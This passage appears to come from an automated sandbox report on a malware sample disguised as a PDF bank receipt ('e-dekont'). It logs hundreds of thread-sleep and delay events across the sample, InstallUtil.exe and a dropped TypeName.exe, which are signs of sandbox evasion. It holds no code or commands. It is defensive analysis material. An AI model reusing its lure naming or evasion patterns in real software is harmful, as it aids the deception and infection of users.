              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599875
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599766
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599656
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599547
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599219
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599109
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598781
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598672
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598562
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598453
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598213
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598103
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597993
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597875
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597766
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597656
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597547
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597438
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597313
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597188
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596969
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596844
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596734
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596623
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596515
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596406
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596297
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596182
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595969
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595844
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595734
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595625
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595462
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595344
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595195
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594969
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594859
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594750
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594641
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594531
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594422
              Source: C:\Users\user\AppData\Roaming\TypeName.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599891
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599559Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599308Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599185Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598732Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598407Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598282Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598157Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597688Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe; Window / User API: threadDelayed 1164
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe; Window / User API: threadDelayed 3483
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Window / User API: threadDelayed 1750
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Window / User API: threadDelayed 8088
              Source: C:\Users\user\AppData\Roaming\TypeName.exe; Window / User API: threadDelayed 2506
              Source: C:\Users\user\AppData\Roaming\TypeName.exe; Window / User API: threadDelayed 1391
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Window / User API: threadDelayed 7252
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Window / User API: threadDelayed 2562
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 5676Thread sleep count: 1164 > 30Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 5676Thread sleep count: 3483 > 30Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99671s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99452s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -99015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98796s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98684s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98574s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98468s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98248s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -98130s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -97984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe TID: 3816Thread sleep time: -97819s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep count: 34 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -31359464925306218s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5008Thread sleep count: 1750 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5008Thread sleep count: 8088 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598890s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598672s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598562s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598453s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598340s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598213s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -598103s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597993s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597438s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597313s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597188s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -597078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596844s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596734s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596623s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596515s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596406s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596297s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596182s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -596078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595844s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595734s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595625s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595462s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595344s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595195s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -595078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594859s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594641s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594531s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4208Thread sleep time: -594422s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 3668Thread sleep count: 2506 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 3668Thread sleep count: 1391 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -11990383647911201s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99875s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99766s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99656s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99547s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99438s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99313s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99188s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -99063s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98953s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98844s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98719s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98609s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98500s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98390s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98281s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exe TID: 320Thread sleep time: -98170s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep count: 37 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -34126476536362649s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599891s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 652Thread sleep count: 7252 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 652Thread sleep count: 2562 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599559s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599308s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599185s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -599078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598844s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598732s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598625s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598516s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598407s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598282s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598157s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -598047s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597938s >= -30000sJump to behavior
